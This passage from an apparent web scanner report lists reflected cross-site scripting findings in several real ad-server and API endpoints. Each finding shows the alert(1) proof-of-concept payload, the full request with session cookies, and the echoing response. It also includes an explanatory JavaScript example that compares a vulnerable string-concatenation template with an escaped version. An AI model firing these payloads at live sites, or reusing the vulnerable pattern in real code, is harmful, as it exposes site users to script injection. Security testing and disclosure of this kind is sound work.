Date: Sat, 17 Sep 2011 01:53:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... hone1.value + document.alertForm.phone2.value + document.alertForm.phone3.value; var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo; url += '&creativeID=10000522ba94d';alert(1)//bdd52ed5568&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg';
var leagueId = _gel('leagueId').value; if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId; els ...[SNIP]...
4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
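The quoted-string findings in this report (4.41, 4.42, 4.51 and this one, plus the double-quoted variant in 4.46) share one template pattern: a request parameter concatenated into a quoted JavaScript string literal. The following is an added example, not code from the report or from any of the ad servers it lists, that rebuilds the pattern in the shape of the alerts.4info.com response beside a hardened rendering, and runs both against the report's own probes in a stub browser. The template functions, the stub browser and the variable names are assumptions for the illustration.

```javascript
// Added example; not the code of any ad server in this report (none of it
// is public). Template functions and the stub browser are assumptions; the
// two probe strings are the report's own.

// Vulnerable: the parameter lands inside a '...' literal unchanged.
function renderVulnerable(creativeId) {
  return "var url = 'http://alerts.4info.com/SetUpAlert?creativeID=" +
    creativeId + "&affiliateID=null';\n" +
    'document.write(url);';
}

// Hardened: emit the value as a JavaScript string literal in which every
// character that could end the literal, the line or the <script> element
// is \uXXXX-escaped, then URL-encode it in the browser before it becomes
// part of a URL.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\/\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(creativeId) {
  return 'var creativeId = ' + jsStringLiteral(creativeId) + ';\n' +
    "var url = 'http://alerts.4info.com/SetUpAlert?creativeID=' + " +
    "encodeURIComponent(creativeId) + '&affiliateID=null';\n" +
    'document.write(url);';
}

// Minimal stand-in for a browser: runs the generated script with a
// document.write() that records output and an alert() that counts calls.
function runInStubBrowser(script) {
  const result = { alerts: 0, written: '' };
  new Function('document', 'alert', script)(
    { write: (s) => { result.written += String(s); } },
    () => { result.alerts += 1; });
  return result;
}

// Probes from the report: the 4.41 form (quote break with minus operators,
// which parses even inside a call argument) and the 4.51 form (quote,
// statement separator, line comment; %3b has already been URL-decoded by
// the time the server concatenates it).
const PROBES = [
  "300x250906f3'-alert(1)-'8a5c815ddd2",
  "10000522ba94d';alert(1)//bdd52ed5568",
];

function compare(payload) {
  return {
    vulnerable: runInStubBrowser(renderVulnerable(payload)),
    safe: runInStubBrowser(renderSafe(payload)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of PROBES) {
    const r = compare(p);
    console.log(p, '-> vulnerable alerts:', r.vulnerable.alerts,
      '| hardened alerts:', r.safe.alerts);
  }
}
```

Run it with node. In the hardened output the probe survives only as data: the server-side \uXXXX escapes mean the browser never sees a bare quote, slash or angle bracket in the script source, and the browser-side encodeURIComponent then percent-encodes ; and / before the value becomes part of the URL (it leaves ' alone, which is harmless there because the string literal was already emitted with \u0027). Escaping to \uXXXX rather than backslash-quoting is deliberate: it stays correct when the same literal is later placed inside an HTML attribute, and a </script> sequence in the data cannot terminate the script element.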
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg5bfe2'%3balert(1)//712e3a0ece8&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:51:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... ue; var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo; url += '&creativeID=10000522&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg5bfe2';alert(1)//712e3a0ece8';
var leagueId = _gel('leagueId').value; if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId; else url += "&teamID=" + _gel('teamId').value;
if (window.XMLHttpReque ...[SNIP]...
4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef90c0f"><script>alert(1)</script>584e56fd634&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17277
Date: Sat, 17 Sep 2011 01:52:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... <div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000;background-color:#efefef90c0f"><script>alert(1)</script>584e56fd634"> ...[SNIP]...
4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the "tags" here are a <style> element: the HTML parser treats everything up to the next </style> as raw text, so the <script> element in this probe does not execute where it lands, and a working attack has to close the style element first. Because the value is reflected unmodified that is a matter of the payload, not of the sink; the underlying fault is that a colour value is emitted into CSS without being validated.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef235f2<script>alert(1)</script>4125eaa7b51&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17271
Date: Sat, 17 Sep 2011 01:52:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... <style type="text/css"> html, body { margin:0; padding:0; height:100%; border:none; background-color:efefef235f2<script>alert(1)</script>4125eaa7b51 }
</style> ...[SNIP]...
4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefefaa51b<script>alert(1)</script>c93f4630dc4&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17189 Date: Sat, 17 Sep 2011 01:51:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... rder:none; } a, a:visited { color:#000099; font-weight:bold; } .MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; } .HasBorder { border:solid 1px #efefefaa51b<script>alert(1)</script>c93f4630dc4; } .TitleText { color:#000000; font-weight:bold; font-size:10px; } .NormalText { color:#000000; font-size:10px; } .MsgText { color:red; font-size:10px; } .nobold { font-weight:normal; }
#header ...[SNIP]...
4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=00009976dc4<script>alert(1)</script>e5a3998eb1c&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17189 Date: Sat, 17 Sep 2011 01:52:31 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... <style type="text/css">
html, body { margin:0; padding:0; height:100%; border:none; } a, a:visited { color:#00009976dc4<script>alert(1)</script>e5a3998eb1c; font-weight:bold; } .MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; } .HasBorder { border:solid 1px #efefef; } .TitleText { color:#000000; font-weig ...[SNIP]...
4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=00000086a95<script>alert(1)</script>6511ba6bdbc&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17230 Date: Sat, 17 Sep 2011 01:53:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... lor:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; } .HasBorder { border:solid 1px #efefef; } .TitleText { color:#000000; font-weight:bold; font-size:10px; } .NormalText { color:#00000086a95<script>alert(1)</script>6511ba6bdbc; font-size:10px; } .MsgText { color:red; font-size:10px; } .nobold { font-weight:normal; }
#headerDiv { background-color:#FFF;margin:2px;margin-top:0px;font-size:11px;font-weight:bold; } #header ...[SNIP]...
4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000bc3c7"><script>alert(1)</script>9ace1e3c9ad&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17234 Date: Sat, 17 Sep 2011 01:53:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... <div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000bc3c7"><script>alert(1)</script>9ace1e3c9ad;background-color:#efefef"> ...[SNIP]...
4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000835d5<script>alert(1)</script>6102431f71c&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17189 Date: Sat, 17 Sep 2011 01:52:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... lor:#000099; font-weight:bold; } .MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; } .HasBorder { border:solid 1px #efefef; } .TitleText { color:#000000835d5<script>alert(1)</script>6102431f71c; font-weight:bold; font-size:10px; } .NormalText { color:#000000; font-size:10px; } .MsgText { color:red; font-size:10px; } .nobold { font-weight:normal; }
#headerDiv { background-color:#FFF;mar ...[SNIP]...
4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl688d1'%3balert(1)//add2da0c4a4&default_team=&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17176 Date: Sat, 17 Sep 2011 01:53:51 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... Id, conference, conferenceId, teamId); populateMenu("leagueId", "leagues", "", "", "", "", "");
function setLeague() { if (getSelectVal('leagueId') == '-1') { defaultSelectTo('leagueId', 'nfl688d1';alert(1)//add2da0c4a4'); setTimeout('leagueSelect()',500); } } function setConference() { if (getSelectVal('conferenceId') == '-1') { defaultSelectTo('conferenceId', 'null'); setTimeout('conferenceSelect()' ...[SNIP]...
4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=82a46'%3balert(1)//40d577401fd&ad_hide_league=false HTTP/1.1 Host: alerts.4info.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/mobile/info.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 17176 Date: Sat, 17 Sep 2011 01:54:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv=" ...[SNIP]... ceId') == '-1') { defaultSelectTo('conferenceId', 'null'); setTimeout('conferenceSelect()',500); } } function setTeam() { if (getSelectVal('teamId') == '-1') defaultSelectTo('teamId', '82a46';alert(1)//40d577401fd'); }
setTimeout('setLeague()',500); setTimeout('setLeague()',1500); setTimeout('setLeague()',2500);
setTimeout('setTeam()',1500); setTimeout('setTeam()',2500); setTimeout('setTeam() ...[SNIP]...
4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]
Summary
Severity: High
Confidence: Certain
Host: http://api.bizographics.com
Path: /v2/profile.redirect
Issue detail
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Sat, 17 Sep 2011 01:17:40 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=af410166-6960-4ca8-98db-488008c83cf7;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 92 Connection: keep-alive
Unknown API key: (1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a)
4.63. http://api.dimestore.com/viapi [id parameter]
Summary
Severity: High
Confidence: Firm
Host: http://api.dimestore.com
Path: /viapi
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
